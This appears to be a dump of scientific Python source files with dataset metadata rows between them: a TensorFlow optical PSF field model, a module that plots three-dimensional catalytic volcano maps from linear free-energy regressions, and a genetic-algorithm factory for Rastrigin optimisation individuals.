n_zernikes: int
Order of the Zernike polynomial for the parametric model.
d_max: int
Maximum degree of the polynomial for the Zernike coefficient variations.
x_lims: [float, float]
Limits for the x coordinate of the PSF field.
y_lims: [float, float]
        Limits for the y coordinate of the PSF field.
coeff_mat: Tensor or None
Initialization of the coefficient matrix defining the parametric psf
field model.
"""
def __init__(
self,
zernike_maps,
obscurations,
batch_size,
output_Q,
l2_param=1e-11,
output_dim=64,
n_zernikes=45,
d_max=2,
x_lims=[0, 1e3],
y_lims=[0, 1e3],
coeff_mat=None,
name='TF_PSF_field_model_l2_OPD'
):
super(TF_PSF_field_model_l2_OPD, self).__init__()
self.output_Q = output_Q
# Inputs: TF_poly_Z_field
self.n_zernikes = n_zernikes
self.d_max = d_max
self.x_lims = x_lims
self.y_lims = y_lims
# Inputs: TF_zernike_OPD
# They are not stored as they are memory-heavy
# zernike_maps =[]
# Inputs: TF_batch_poly_PSF
self.batch_size = batch_size
self.obscurations = obscurations
self.output_dim = output_dim
# Inputs: Loss
self.l2_param = l2_param
# Initialize the first layer
self.tf_poly_Z_field = TF_poly_Z_field(
x_lims=self.x_lims, y_lims=self.y_lims, n_zernikes=self.n_zernikes, d_max=self.d_max
)
# Initialize the zernike to OPD layer
self.tf_zernike_OPD = TF_zernike_OPD(zernike_maps=zernike_maps)
# Initialize the batch opd to batch polychromatic PSF layer
self.tf_batch_poly_PSF = TF_batch_poly_PSF(
obscurations=self.obscurations, output_Q=self.output_Q, output_dim=self.output_dim
)
# Initialize the model parameters with non-default value
if coeff_mat is not None:
self.assign_coeff_matrix(coeff_mat)
def get_coeff_matrix(self):
""" Get coefficient matrix."""
return self.tf_poly_Z_field.get_coeff_matrix()
def assign_coeff_matrix(self, coeff_mat):
""" Assign coefficient matrix."""
self.tf_poly_Z_field.assign_coeff_matrix(coeff_mat)
def set_output_Q(self, output_Q, output_dim=None):
""" Set the value of the output_Q parameter.
Useful for generating/predicting PSFs at a different sampling wrt the
observation sampling.
"""
self.output_Q = output_Q
if output_dim is not None:
self.output_dim = output_dim
# Reinitialize the PSF batch poly generator
self.tf_batch_poly_PSF = TF_batch_poly_PSF(
obscurations=self.obscurations, output_Q=self.output_Q, output_dim=self.output_dim
)
def predict_mono_psfs(self, input_positions, lambda_obs, phase_N):
""" Predict a set of monochromatic PSF at desired positions.
input_positions: Tensor(batch_dim x 2)
lambda_obs: float
Observed wavelength in um.
phase_N: int
Required wavefront dimension. Should be calculated with as:
``simPSF_np = wf.SimPSFToolkit(...)``
``phase_N = simPSF_np.feasible_N(lambda_obs)``
"""
# Initialise the monochromatic PSF batch calculator
tf_batch_mono_psf = TF_batch_mono_PSF(
obscurations=self.obscurations, output_Q=self.output_Q, output_dim=self.output_dim
)
# Set the lambda_obs and the phase_N parameters
tf_batch_mono_psf.set_lambda_phaseN(phase_N, lambda_obs)
        # Compute the OPD maps
zernike_coeffs = self.tf_poly_Z_field(input_positions)
opd_maps = self.tf_zernike_OPD(zernike_coeffs)
# Compute the monochromatic PSFs
mono_psf_batch = tf_batch_mono_psf(opd_maps)
return mono_psf_batch
def predict_opd(self, input_positions):
""" Predict the OPD at some positions.
Parameters
----------
input_positions: Tensor(batch_dim x 2)
Positions to predict the OPD.
Returns
-------
opd_maps : Tensor [batch x opd_dim x opd_dim]
OPD at requested positions.
"""
        # Compute the OPD maps
zernike_coeffs = self.tf_poly_Z_field(input_positions)
opd_maps = self.tf_zernike_OPD(zernike_coeffs)
return opd_maps
def call(self, inputs):
"""Define the PSF field forward model.
[1] From positions to Zernike coefficients
[2] From Zernike coefficients to OPD maps
[3] From OPD maps and SED info to polychromatic PSFs
OPD: Optical Path Differences
"""
# Unpack inputs
input_positions = inputs[0]
packed_SEDs = inputs[1]
# Continue the forward model
zernike_coeffs = self.tf_poly_Z_field(input_positions)
opd_maps = self.tf_zernike_OPD(zernike_coeffs)
# Add l2 loss on the OPD
self.add_loss(self.l2_param * tf.math.reduce_sum(tf.math.square(opd_maps)))
poly_psfs = self.tf_batch_poly_PSF([opd_maps, packed_SEDs])
return poly_psfs
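A hedged construction sketch, assuming wf_psf is importable; the tensor shapes below are toy placeholders (3 Zernike maps on a 32x32 pupil), an untested illustration rather than a recipe:
zernike_maps = tf.random.normal((3, 32, 32))  # toy stand-in for real Zernike maps
obscurations = tf.ones((32, 32))              # toy stand-in for the pupil obscurations
model = TF_SemiParam_field_l2_OPD(
    zernike_maps, obscurations, batch_size=2, output_Q=3, n_zernikes=3, output_dim=16
)
positions = tf.constant([[100.0, 200.0], [300.0, 400.0]])
opd = model.predict_opd(positions)            # Tensor [2 x 32 x 32]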
| 33.76555
| 99
| 0.657007
| 1,943
| 14,114
| 4.477097
| 0.106022
| 0.023451
| 0.014484
| 0.02483
| 0.879067
| 0.859754
| 0.853087
| 0.847339
| 0.83228
| 0.83228
| 0
| 0.006359
| 0.275755
| 14,114
| 417
| 100
| 33.846523
| 0.844649
| 0.416324
| 0
| 0.802548
| 0
| 0
| 0.006732
| 0.006732
| 0
| 0
| 0
| 0
| 0
| 1
| 0.10828
| false
| 0
| 0.025478
| 0
| 0.197452
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
85c2560af9cce407afbc8cec3f3bccfdc28fddd2
| 23,390
|
py
|
Python
|
volcanic/plotting3d.py
|
rlaplaza/volcanic
|
31273300c2e96397a489db3653221659847652f9
|
[
"MIT"
] | 1
|
2022-03-07T13:35:39.000Z
|
2022-03-07T13:35:39.000Z
|
volcanic/plotting3d.py
|
rlaplaza/volcanic
|
31273300c2e96397a489db3653221659847652f9
|
[
"MIT"
] | null | null | null |
volcanic/plotting3d.py
|
rlaplaza/volcanic
|
31273300c2e96397a489db3653221659847652f9
|
[
"MIT"
] | 1
|
2022-01-12T13:58:59.000Z
|
2022-01-12T13:58:59.000Z
|
#!/usr/bin/env python
import numpy as np
import scipy.stats as stats
import itertools
import matplotlib
from matplotlib import cm
from matplotlib.ticker import FuncFormatter
matplotlib.use("Agg")
import matplotlib.pyplot as plt
import sklearn as sk
import sklearn.linear_model
from volcanic.helpers import bround
from volcanic.tof import calc_tof, calc_es, calc_s_es
from volcanic.exceptions import MissingDataError
def get_reg_targets(idx1, idx2, d, tags, coeff, regress, mode="k"):
"""Separate regression targets and regressor variables."""
tag1 = tags[idx1]
tag2 = tags[idx2]
tags = tags[regress]
X1 = d[:, idx1].reshape(-1)
X2 = d[:, idx2].reshape(-1)
d1 = d[:, regress]
d2 = d[:, ~regress]
coeff = coeff[regress]
if mode == "t":
d1 = d1[:, ~coeff]
tags = tags[~coeff]
return X1, X2, tag1, tag2, tags, d1, d2, coeff
def plot_ci_manual(t, s_err, n, x, x2, y2, ax=None):
if ax is None:
ax = plt.gca()
ci = (
t
* s_err
* np.sqrt(1 / n + (x2 - np.mean(x)) ** 2 / np.sum((x - np.mean(x)) ** 2))
)
ax.fill_between(x2, y2 + ci, y2 - ci, color="#b9cfe7", alpha=0.6)
return ax
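# Aside: the band drawn by plot_ci_manual is the usual OLS mean-response
# confidence interval, ci = t * s_err * sqrt(1/n + (x0 - mean(x))**2 / Sxx),
# evaluated at each plotting abscissa x0. A hypothetical standalone helper:
def _ci_halfwidth_sketch(t, s_err, x, x0):
    n = x.size
    sxx = np.sum((x - np.mean(x)) ** 2)
    return t * s_err * np.sqrt(1 / n + (x0 - np.mean(x)) ** 2 / sxx)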
def plot_3d_lsfer(
idx1,
idx2,
d,
tags,
coeff,
regress,
cb="white",
ms="o",
lmargin=5,
rmargin=5,
npoints=100,
plotmode=1,
verb=0,
):
x1base = 20
x2base = 20
X1, X2, tag1, tag2, tags, d, d2, coeff = get_reg_targets(
idx1, idx2, d, tags, coeff, regress, mode="k"
)
d_refill = np.zeros_like(d)
d_refill[~np.isnan(d)] = d[~np.isnan(d)]
lnsteps = range(d.shape[1])
mape = 100
for j in lnsteps[1:-1]:
if verb > 0:
print(f"Plotting regression of {tags[j]}.")
XY = np.vstack([X1, X2, d[:, j]]).T
if isinstance(cb, np.ndarray):
cbi = np.array(cb)[~np.isnan(XY).any(axis=1)]
else:
cbi = cb
if isinstance(ms, np.ndarray):
msi = np.array(ms)[~np.isnan(XY).any(axis=1)]
else:
msi = ms
XYm = XY[np.isnan(XY).any(axis=1)]
XY = XY[~np.isnan(XY).any(axis=1)]
Xm = XYm[:, :2]
Ym = XYm[:, 2]
X = XY[:, :2]
Y = XY[:, 2]
xmax = bround(Y.max() + rmargin, x1base)
xmin = bround(Y.min() - lmargin, x1base)
xint = np.sort(Y)
reg = sk.linear_model.LinearRegression().fit(X, Y)
if verb > 2:
print(
f"Linear model has coefficients : {reg.coef_} \n and intercept {reg.intercept_}"
)
Y_pred = reg.predict(X)
p = reg.coef_
currmape = sk.metrics.mean_absolute_percentage_error(Y, Y_pred)
        for k, y in enumerate(Ym):
            if not np.isnan(Xm[k, 0]) and not np.isnan(Xm[k, 1]) and np.isnan(Ym[k]):
                # Both descriptors known, target missing: predict the target.
                Ym[k] = reg.predict(Xm[k].reshape(1, -1))[0]
                d_refill[np.isnan(d).any(axis=1)][:, j][k] = Ym[k]
            elif not np.isnan(Ym[k]) and not np.isnan(Xm[k, 0]):
                # Target and first descriptor known: solve the linear model for the second.
                if currmape < mape:
                    Xm[k, 1] = (
                        Ym[k] - reg.intercept_ - reg.coef_[0] * Xm[k, 0]
                    ) / reg.coef_[1]
                    d_refill[np.isnan(d).any(axis=1)][:, idx2][k] = Xm[k, 1]
                    mape = currmape
            elif not np.isnan(Ym[k]) and not np.isnan(Xm[k, 1]):
                # Target and second descriptor known: solve for the first descriptor.
                if currmape < mape:
                    Xm[k, 0] = (
                        Ym[k] - reg.intercept_ - reg.coef_[1] * Xm[k, 1]
                    ) / reg.coef_[0]
                    d_refill[np.isnan(d).any(axis=1)][:, idx1][k] = Xm[k, 0]
                    mape = currmape
            else:
                raise MissingDataError(
                    "Both descriptor and regression target are undefined. This should have been fixed before this point. Exiting."
                )
n = Y.size
m = p.size
dof = n - m
t = stats.t.ppf(0.95, dof)
resid = Y - Y_pred
chi2 = np.sum((resid / Y_pred) ** 2)
s_err = np.sqrt(np.sum(resid ** 2) / dof)
fig, ax = plt.subplots(
frameon=False, figsize=[3, 3], dpi=300, constrained_layout=True
)
yint = np.sort(Y_pred)
plot_ci_manual(t, s_err, n, X, xint, yint, ax=ax)
pi = (
t
* s_err
* np.sqrt(
1 + 1 / n + (xint - np.mean(X)) ** 2 / np.sum((X - np.mean(X)) ** 2)
)
)
ax.plot(xint, yint, "-", linewidth=1, color="#000a75", alpha=0.85)
for i in range(len(X)):
ax.scatter(
Y_pred[i],
Y[i],
s=12.5,
c=cbi[i],
marker=msi[i],
linewidths=0.15,
edgecolors="black",
)
# Border
ax.spines["top"].set_color("black")
ax.spines["bottom"].set_color("black")
ax.spines["left"].set_color("black")
ax.spines["right"].set_color("black")
ax.get_xaxis().set_tick_params(direction="out")
ax.get_yaxis().set_tick_params(direction="out")
ax.xaxis.tick_bottom()
ax.yaxis.tick_left()
# Labels and key
plt.xlabel(f"Function of {tag1} and {tag2}")
plt.ylabel(f"{tags[j]} [kcal/mol]")
plt.xlim(xmin, xmax)
plt.savefig(f"{tags[j]}.png")
return np.hstack((d_refill, d2))
def plot_3d_t_volcano(
idx1,
idx2,
d,
tags,
coeff,
regress,
dgr,
cb="white",
ms="o",
lmargin=15,
rmargin=15,
npoints=200,
plotmode=1,
verb=0,
):
x1base = 25
x2base = 20
X1, X2, tag1, tag2, tags, d, d2, coeff = get_reg_targets(
idx1, idx2, d, tags, coeff, regress, mode="t"
)
lnsteps = range(d.shape[1])
x1max = bround(X1.max() + rmargin, x1base)
x1min = bround(X1.min() - lmargin, x1base)
x2max = bround(X2.max() + rmargin, x2base)
x2min = bround(X2.min() - lmargin, x2base)
if verb > 1:
print(
f"Range of descriptors set to [ {x1min} , {x1max} ] and [ {x2min} , {x2max} ]"
)
xint = np.linspace(x1min, x1max, npoints)
yint = np.linspace(x2min, x2max, npoints)
grids = []
for i, j in enumerate(lnsteps):
XY = np.vstack([X1, X2, d[:, j]]).T
X = XY[:, :2]
Y = XY[:, 2]
reg = sk.linear_model.LinearRegression().fit(X, Y)
Y_pred = reg.predict(X)
gridj = np.zeros((npoints, npoints))
for k, x1 in enumerate(xint):
for l, x2 in enumerate(yint):
x1x2 = np.vstack([x1, x2]).reshape(1, -1)
gridj[k, l] = reg.predict(x1x2)
grids.append(gridj)
grid = np.zeros_like(gridj)
ridmax = np.zeros_like(gridj, dtype=int)
ridmin = np.zeros_like(gridj, dtype=int)
rb = np.zeros_like(gridj, dtype=int)
for k, x1 in enumerate(xint):
for l, x2 in enumerate(yint):
profile = [gridj[k, l] for gridj in grids][:-1]
dgr = [gridj[k, l] for gridj in grids][-1]
grid[k, l], ridmax[k, l], ridmin[k, l], diff = calc_s_es(
profile, dgr, esp=True
)
rid = np.hstack([ridmin, ridmax])
if verb > 0:
pass
ymin = grid.min()
ymax = grid.max()
px = np.zeros_like(d[:, 0])
py = np.zeros_like(d[:, 0])
for i in range(d.shape[0]):
profile = d[i, :-1]
dgr = d[i][-1]
px[i] = X1[i]
py[i] = X2[i]
x1label = f"{tag1} [kcal/mol]"
x2label = f"{tag2} [kcal/mol]"
ylabel = "-ΔG(pds) [kcal/mol]"
filename = f"t_volcano_{tag1}_{tag2}.png"
if verb > 0:
csvname = f"t_volcano_{tag1}_{tag2}.csv"
print(f"Saving volcano data to file {csvname}")
x = np.zeros_like(grid.reshape(-1))
y = np.zeros_like(grid.reshape(-1))
for i, xy in enumerate(itertools.product(xint, yint)):
x[i] = xy[0]
y[i] = xy[1]
zdata = list(zip(x, y, grid.reshape(-1)))
np.savetxt(
csvname,
zdata,
fmt="%.4e",
delimiter=",",
header="Descriptor 1, Descriptor 2, -\D_pds",
)
if plotmode == 2:
plot_3d_contour(
xint,
yint,
grid.T,
px,
py,
ymin,
ymax,
x1min,
x1max,
x2min,
x2max,
x1base,
x2base,
x1label=x1label,
x2label=x2label,
ylabel=ylabel,
filename=filename,
cb=cb,
ms=ms,
plotmode=plotmode,
)
else:
plot_3d_scatter(
xint,
yint,
grid.T,
px,
py,
ymin,
ymax,
x1min,
x1max,
x2min,
x2max,
x1base,
x2base,
x1label=x1label,
x2label=x2label,
ylabel=ylabel,
filename=filename,
cb=cb,
ms=ms,
plotmode=plotmode,
)
return xint, yint, grid, px, py
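# Aside: the per-point double loop over (xint, yint) used above can be replaced
# by a single vectorized predict over the whole grid; a hypothetical equivalent:
def _predict_grid_sketch(reg, xint, yint):
    xx, yy = np.meshgrid(xint, yint, indexing="ij")
    pts = np.column_stack([xx.ravel(), yy.ravel()])
    return reg.predict(pts).reshape(xx.shape)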
def plot_3d_k_volcano(
idx1,
idx2,
d,
tags,
coeff,
regress,
dgr,
cb="white",
ms="o",
lmargin=15,
rmargin=15,
npoints=200,
plotmode=1,
verb=0,
):
x1base = 25
x2base = 20
X1, X2, tag1, tag2, tags, d, d2, coeff = get_reg_targets(
idx1, idx2, d, tags, coeff, regress, mode="k"
)
lnsteps = range(d.shape[1])
x1max = bround(X1.max() + rmargin, x1base)
x1min = bround(X1.min() - lmargin, x1base)
x2max = bround(X2.max() + rmargin, x2base)
x2min = bround(X2.min() - lmargin, x2base)
if verb > 1:
print(
f"Range of descriptors set to [ {x1min} , {x1max} ] and [ {x2min} , {x2max} ]"
)
xint = np.linspace(x1min, x1max, npoints)
yint = np.linspace(x2min, x2max, npoints)
grids = []
for i, j in enumerate(lnsteps):
XY = np.vstack([X1, X2, d[:, j]]).T
X = XY[:, :2]
Y = XY[:, 2]
reg = sk.linear_model.LinearRegression().fit(X, Y)
Y_pred = reg.predict(X)
gridj = np.zeros((npoints, npoints))
for k, x1 in enumerate(xint):
for l, x2 in enumerate(yint):
x1x2 = np.vstack([x1, x2]).reshape(1, -1)
gridj[k, l] = reg.predict(x1x2)
grids.append(gridj)
grid = np.zeros_like(gridj)
ridmax = np.zeros_like(gridj, dtype=int)
ridmin = np.zeros_like(gridj, dtype=int)
rb = np.zeros_like(gridj, dtype=int)
for k, x1 in enumerate(xint):
for l, x2 in enumerate(yint):
profile = [gridj[k, l] for gridj in grids][:-1]
dgr = [gridj[k, l] for gridj in grids][-1]
grid[k, l], ridmax[k, l], ridmin[k, l], diff = calc_s_es(
profile, dgr, esp=True
)
rid = np.hstack([ridmin, ridmax])
if verb > 0:
pass
ymin = grid.min()
ymax = grid.max()
px = np.zeros_like(d[:, 0])
py = np.zeros_like(d[:, 0])
for i in range(d.shape[0]):
profile = d[i, :-1]
px[i] = X1[i]
py[i] = X2[i]
x1label = f"{tag1} [kcal/mol]"
x2label = f"{tag2} [kcal/mol]"
ylabel = "-ΔG(kds) [kcal/mol]"
filename = f"k_volcano_{tag1}_{tag2}.png"
if verb > 0:
csvname = f"k_volcano_{tag1}_{tag2}.csv"
print(f"Saving volcano data to file {csvname}")
x = np.zeros_like(grid.reshape(-1))
y = np.zeros_like(grid.reshape(-1))
for i, xy in enumerate(itertools.product(xint, yint)):
x[i] = xy[0]
y[i] = xy[1]
zdata = list(zip(x, y, grid.reshape(-1)))
np.savetxt(
csvname,
zdata,
fmt="%.4e",
delimiter=",",
header="Descriptor 1, Descriptor 2, -\D_kds",
)
if plotmode == 2:
plot_3d_contour(
xint,
yint,
grid.T,
px,
py,
ymin,
ymax,
x1min,
x1max,
x2min,
x2max,
x1base,
x2base,
x1label=x1label,
x2label=x2label,
ylabel=ylabel,
filename=filename,
cb=cb,
ms=ms,
plotmode=plotmode,
)
else:
plot_3d_scatter(
xint,
yint,
grid.T,
px,
py,
ymin,
ymax,
x1min,
x1max,
x2min,
x2max,
x1base,
x2base,
x1label=x1label,
x2label=x2label,
ylabel=ylabel,
filename=filename,
cb=cb,
ms=ms,
plotmode=plotmode,
)
return xint, yint, grid, px, py
def plot_3d_es_volcano(
idx1,
idx2,
d,
tags,
coeff,
regress,
dgr,
cb="white",
ms="o",
lmargin=15,
rmargin=15,
npoints=200,
plotmode=1,
verb=0,
):
x1base = 25
x2base = 20
X1, X2, tag1, tag2, tags, d, d2, coeff = get_reg_targets(
idx1, idx2, d, tags, coeff, regress, mode="k"
)
lnsteps = range(d.shape[1])
x1max = bround(X1.max() + rmargin, x1base)
x1min = bround(X1.min() - lmargin, x1base)
x2max = bround(X2.max() + rmargin, x2base)
x2min = bround(X2.min() - lmargin, x2base)
if verb > 1:
print(
f"Range of descriptors set to [ {x1min} , {x1max} ] and [ {x2min} , {x2max} ]"
)
xint = np.linspace(x1min, x1max, npoints)
yint = np.linspace(x2min, x2max, npoints)
grids = []
for i, j in enumerate(lnsteps):
XY = np.vstack([X1, X2, d[:, j]]).T
X = XY[:, :2]
Y = XY[:, 2]
reg = sk.linear_model.LinearRegression().fit(X, Y)
Y_pred = reg.predict(X)
gridj = np.zeros((npoints, npoints))
for k, x1 in enumerate(xint):
for l, x2 in enumerate(yint):
x1x2 = np.vstack([x1, x2]).reshape(1, -1)
gridj[k, l] = reg.predict(x1x2)
grids.append(gridj)
grid = np.zeros_like(gridj)
ridmax = np.zeros_like(gridj, dtype=int)
ridmin = np.zeros_like(gridj, dtype=int)
rb = np.zeros_like(gridj, dtype=int)
for k, x1 in enumerate(xint):
for l, x2 in enumerate(yint):
profile = [gridj[k, l] for gridj in grids][:-1]
dgr = [gridj[k, l] for gridj in grids][-1]
grid[k, l], ridmax[k, l], ridmin[k, l], diff = calc_es(
profile, dgr, esp=True
)
rid = np.hstack([ridmin, ridmax])
if verb > 0:
pass
ymin = grid.min()
ymax = grid.max()
px = np.zeros_like(d[:, 0])
py = np.zeros_like(d[:, 0])
for i in range(d.shape[0]):
profile = d[i, :-1]
px[i] = X1[i]
py[i] = X2[i]
x1label = f"{tag1} [kcal/mol]"
x2label = f"{tag2} [kcal/mol]"
ylabel = r"-δ$E$ [kcal/mol]"
filename = f"es_volcano_{tag1}_{tag2}.png"
if verb > 0:
csvname = f"es_volcano_{tag1}_{tag2}.csv"
print(f"Saving volcano data to file {csvname}")
x = np.zeros_like(grid.reshape(-1))
y = np.zeros_like(grid.reshape(-1))
for i, xy in enumerate(itertools.product(xint, yint)):
x[i] = xy[0]
y[i] = xy[1]
zdata = list(zip(x, y, grid.reshape(-1)))
np.savetxt(
csvname,
zdata,
fmt="%.4e",
delimiter=",",
header="Descriptor 1, Descriptor 2, -\d_Ges",
)
if plotmode == 2:
plot_3d_contour(
xint,
yint,
grid.T,
px,
py,
ymin,
ymax,
x1min,
x1max,
x2min,
x2max,
x1base,
x2base,
x1label=x1label,
x2label=x2label,
ylabel=ylabel,
filename=filename,
cb=cb,
ms=ms,
plotmode=plotmode,
)
else:
plot_3d_scatter(
xint,
yint,
grid.T,
px,
py,
ymin,
ymax,
x1min,
x1max,
x2min,
x2max,
x1base,
x2base,
x1label=x1label,
x2label=x2label,
ylabel=ylabel,
filename=filename,
cb=cb,
ms=ms,
plotmode=plotmode,
)
return xint, yint, grid, px, py
def plot_3d_tof_volcano(
idx1,
idx2,
d,
tags,
coeff,
regress,
dgr,
T=298.15,
cb="white",
ms="o",
lmargin=15,
rmargin=15,
npoints=200,
plotmode=1,
verb=0,
):
x1base = 25
x2base = 20
X1, X2, tag1, tag2, tags, d, d2, coeff = get_reg_targets(
idx1, idx2, d, tags, coeff, regress, mode="k"
)
lnsteps = range(d.shape[1])
x1max = bround(X1.max() + rmargin, x1base)
x1min = bround(X1.min() - lmargin, x1base)
x2max = bround(X2.max() + rmargin, x2base)
x2min = bround(X2.min() - lmargin, x2base)
if verb > 1:
print(
f"Range of descriptors set to [ {x1min} , {x1max} ] and [ {x2min} , {x2max} ]"
)
xint = np.linspace(x1min, x1max, npoints)
yint = np.linspace(x2min, x2max, npoints)
grids = []
for i, j in enumerate(lnsteps):
XY = np.vstack([X1, X2, d[:, j]]).T
X = XY[:, :2]
Y = XY[:, 2]
reg = sk.linear_model.LinearRegression().fit(X, Y)
Y_pred = reg.predict(X)
gridj = np.zeros((npoints, npoints))
for k, x1 in enumerate(xint):
for l, x2 in enumerate(yint):
x1x2 = np.vstack([x1, x2]).reshape(1, -1)
gridj[k, l] = reg.predict(x1x2)
grids.append(gridj)
grid = np.zeros_like(gridj)
rb = np.zeros_like(gridj, dtype=int)
for k, x1 in enumerate(xint):
for l, x2 in enumerate(yint):
profile = [gridj[k, l] for gridj in grids]
dgr = [gridj[k, l] for gridj in grids][-1]
grid[k, l] = np.log10(calc_tof(profile, dgr, T, coeff, exact=True)[0])
ymin = grid.min()
ymax = grid.max()
px = np.zeros_like(d[:, 0])
py = np.zeros_like(d[:, 0])
for i in range(d.shape[0]):
profile = d[i, :-1]
px[i] = X1[i]
py[i] = X2[i]
x1label = f"{tag1} [kcal/mol]"
x2label = f"{tag2} [kcal/mol]"
ylabel = "log(TOF) [1/s]"
filename = f"tof_volcano_{tag1}_{tag2}.png"
if verb > 0:
csvname = f"tof_volcano_{tag1}_{tag2}.csv"
print(f"Saving TOF volcano data to file {csvname}")
x = np.zeros_like(grid.reshape(-1))
y = np.zeros_like(grid.reshape(-1))
for i, xy in enumerate(itertools.product(xint, yint)):
x[i] = xy[0]
y[i] = xy[1]
zdata = list(zip(x, y, grid.reshape(-1)))
np.savetxt(
csvname,
zdata,
fmt="%.4e",
delimiter=",",
header="Descriptor 1, Descriptor 2, log10(TOF)",
)
if plotmode == 2:
plot_3d_contour(
xint,
yint,
grid.T,
px,
py,
ymin,
ymax,
x1min,
x1max,
x2min,
x2max,
x1base,
x2base,
x1label=x1label,
x2label=x2label,
ylabel=ylabel,
filename=filename,
cb=cb,
ms=ms,
plotmode=plotmode,
)
else:
plot_3d_scatter(
xint,
yint,
grid.T,
px,
py,
ymin,
ymax,
x1min,
x1max,
x2min,
x2max,
x1base,
x2base,
x1label=x1label,
x2label=x2label,
ylabel=ylabel,
filename=filename,
cb=cb,
ms=ms,
plotmode=plotmode,
)
return xint, yint, grid, px, py
def beautify_ax(ax):
# Border
ax.spines["top"].set_color("black")
ax.spines["bottom"].set_color("black")
ax.spines["left"].set_color("black")
ax.spines["right"].set_color("black")
ax.get_xaxis().set_tick_params(direction="out")
ax.get_yaxis().set_tick_params(direction="out")
ax.xaxis.tick_bottom()
ax.yaxis.tick_left()
return ax
def plot_3d_contour(
xint,
yint,
grid,
px,
py,
ymin,
ymax,
x1min,
x1max,
x2min,
x2max,
x1base,
x2base,
x1label="X1-axis",
x2label="X2-axis",
ylabel="Y-axis",
filename="plot.png",
cb="white",
ms="o",
plotmode=2,
):
fig, ax = plt.subplots(
frameon=False, figsize=[4.2, 3], dpi=300, constrained_layout=True
)
grid = np.clip(grid, ymin, ymax)
norm = cm.colors.Normalize(vmax=ymax, vmin=ymin)
levels = np.arange(ymin - 5, ymax + 5, 2.5)
ax = beautify_ax(ax)
cset = ax.contourf(
xint,
yint,
grid,
levels=levels,
norm=norm,
cmap=cm.get_cmap("jet", len(levels)),
)
# Labels and key
plt.xlabel(x1label)
plt.ylabel(x2label)
plt.xlim(x1min, x1max)
plt.ylim(x2max, x2min)
plt.xticks(np.arange(x1min, x1max + 0.1, x1base))
plt.yticks(np.arange(x2min, x2max + 0.1, x2base))
ax.contour(xint, yint, grid, cset.levels, colors="black", linewidths=0.3)
fmt = lambda x, pos: "%.0f" % x
cbar = fig.colorbar(cset, format=FuncFormatter(fmt))
cbar.set_label(ylabel, labelpad=15, rotation=270)
for i in range(len(px)):
ax.scatter(
px[i],
py[i],
s=12.5,
c=cb[i],
marker=ms[i],
linewidths=0.15,
edgecolors="black",
)
plt.savefig(filename)
def plot_3d_scatter(
xint,
yint,
grid,
px,
py,
ymin,
ymax,
x1min,
x1max,
x2min,
x2max,
x1base,
x2base,
x1label="X1-axis",
x2label="X2-axis",
ylabel="Y-axis",
filename="plot.png",
cb="white",
ms="o",
plotmode=0,
):
fig, ax = plt.subplots(
frameon=False, figsize=[4.2, 3], dpi=300, constrained_layout=True
)
grid = np.clip(grid, ymin, ymax)
norm = cm.colors.Normalize(vmax=ymax, vmin=ymin)
ax = beautify_ax(ax)
cset = ax.imshow(
grid,
interpolation="antialiased",
extent=[x1min, x1max, x2min, x2max],
origin="lower",
cmap=cm.jet,
aspect="auto",
)
# Labels and key
plt.xlabel(x1label)
plt.ylabel(x2label)
plt.xlim(x1min, x1max)
plt.ylim(x2max, x2min)
plt.xticks(np.arange(x1min, x1max + 0.1, x1base))
plt.yticks(np.arange(x2min, x2max + 0.1, x2base))
fmt = lambda x, pos: "%.0f" % x
cbar = fig.colorbar(cset, format=FuncFormatter(fmt))
cbar.set_label(ylabel, labelpad=15, rotation=270)
if plotmode == 1:
for i in range(len(px)):
ax.scatter(
px[i],
py[i],
s=12.5,
c=cb[i],
marker=ms[i],
linewidths=0.15,
edgecolors="black",
)
plt.savefig(filename)
| 27.779097
| 130
| 0.489397
| 2,991
| 23,390
| 3.76329
| 0.105985
| 0.021766
| 0.030295
| 0.019901
| 0.824272
| 0.804371
| 0.78296
| 0.768479
| 0.751066
| 0.739339
| 0
| 0.046778
| 0.368448
| 23,390
| 841
| 131
| 27.812128
| 0.715204
| 0.005643
| 0
| 0.774074
| 0
| 0.004938
| 0.068095
| 0.00955
| 0
| 0
| 0
| 0
| 0
| 1
| 0.012346
| false
| 0.003704
| 0.014815
| 0
| 0.037037
| 0.012346
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a47295d63994429d1b7a4b6f05bba311a33b524a
| 11,252
|
py
|
Python
|
optimization/individual_factory.py
|
fberanizo/sin5006
|
96f7980b5ff61bd4af7852c9d733521edde540eb
|
[
"BSD-2-Clause"
] | null | null | null |
optimization/individual_factory.py
|
fberanizo/sin5006
|
96f7980b5ff61bd4af7852c9d733521edde540eb
|
[
"BSD-2-Clause"
] | null | null | null |
optimization/individual_factory.py
|
fberanizo/sin5006
|
96f7980b5ff61bd4af7852c9d733521edde540eb
|
[
"BSD-2-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
import sys, os
sys.path.insert(0, os.path.abspath('..'))
import ga, optimization, numpy, struct
def binary(num):
    # Pack the float as 4 big-endian bytes; iterating a bytearray yields ints on
    # both Python 2 and 3, avoiding ord() on Python 3 bytes.
    return ''.join(bin(b).replace('0b', '').rjust(8, '0') for b in bytearray(struct.pack('!f', num)))
class RastriginFloatIndividualFactory(ga.IndividualFactory):
def __init__(self, crossover_method='one_point', mutation_method='permutation'):
super(optimization.RastriginFloatIndividualFactory, self).__init__()
self.crossover_method = crossover_method
if mutation_method == 'basic_mutation':
self.mutation_method = self.basic_mutation
else:
self.mutation_method = mutation_method
def create(self):
"""Creates individuals which [x,y] values are uniformly distributed over -5.0 and 5.0."""
genotype = numpy.random.uniform(low=-5.0, high=5.0, size=2)
fitness_evaluator = optimization.RastriginFloatFitnessEvaluator()
return optimization.Individual(genotype, fitness_evaluator, self.crossover_method, self.mutation_method)
def basic_mutation(self_individual, individual):
"""Performs a basic mutation where one value in the chromosome is replaced by another valid value."""
idx = numpy.random.randint(0, len(individual.genotype))
value = numpy.random.uniform(low=-5.0, high=5.0)
numpy.put(individual.genotype, [idx], [value])
individual.fitness = individual.fitness_evaluator.evaluate(individual)
return individual
